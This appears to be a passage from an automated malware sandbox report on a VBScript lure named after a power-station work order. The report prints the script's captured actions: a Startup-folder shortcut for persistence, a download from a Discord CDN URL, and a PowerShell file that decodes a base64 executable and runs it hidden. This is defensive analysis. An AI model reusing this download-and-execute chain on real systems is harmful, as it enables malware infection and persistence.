                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: AutoRunScript.lnk.0.drLNK file: ..\..\..\..\..\..\..\Desktop\WO-663071 Sabiya Power Station Project.vbs
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: VBZXCF.pdb source: powershell.exe, 00000001.00000002.1972857093.000001ED3B0F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1920544621.000001F7AA322000.00000004.00000800.00020000.00000000.sdmp, x.exe.1.dr

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile("C:\Temp\dddddd.ps1", "true");IServerXMLHTTPRequest2.responseText();ITextStream.Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC");ITextStream.Close();IFileSystem3.FolderExists("C:\Temp");IFileSystem3.CreateFolder("C:\Temp");IHost.ScriptFullName();IWshShell3.ExpandEnvironmentStrings("%USERNAME%");IFileSystem3.FolderExists("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRunScript.lnk");IWshShortcut.TargetPath("C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs");IFileSystem3.GetParentFolderName("C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\Desktop");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://cdn.discordapp.com/attachments/1295304757166080020/1316684745", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.status();IFileSystem3.FileExists("C:\Temp\dddddd.ps1");IFileSystem3.CreateTextFile("C:\Temp\dddddd.ps1", "true");IServerXMLHTTPRequest2.responseText();ITextStream.Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC");ITextStream.Close();IWshShell3.Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.", "0", "true")
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile("C:\Temp\dddddd.ps1", "true");IServerXMLHTTPRequest2.responseText();ITextStream.Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC");ITextStream.Close();IFileSystem3.FolderExists("C:\Temp");IHost.ScriptFullName();IWshShell3.ExpandEnvironmentStrings("%USERNAME%");IFileSystem3.FolderExists("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRunScript.lnk");IWshShortcut.TargetPath("C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs");IFileSystem3.GetParentFolderName("C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\Desktop");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://cdn.discordapp.com/attachments/1295304757166080020/1316684745", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.status();IFileSystem3.FileExists("C:\Temp\dddddd.ps1");IFileSystem3.DeleteFile("C:\Temp\dddddd.ps1");IFileSystem3.CreateTextFile("C:\Temp\dddddd.ps1", "true");IServerXMLHTTPRequest2.responseText();ITextStream.Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC");ITextStream.Close();IWshShell3.Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.", "0", "true")
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAL
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAL
                  Source: x.exe.1.drStatic PE information: 0xF8BFD0BA [Sat Apr 1 07:39:38 2102 UTC]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041BCE3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004567E0 push eax; ret 11_2_004567FE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0045B9DD push esi; ret 11_2_0045B9E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00455EAF push ecx; ret 11_2_00455EC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00433FF6 push ecx; ret 11_2_00434009
                  Source: x.exe.1.drStatic PE information: section name: .text entropy: 7.975442967064914
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00406128 ShellExecuteW,URLDownloadToFileW,11_2_00406128
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRunScript.lnkJump to behavior
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRunScript.lnkJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_00419BC4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041BCE3
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
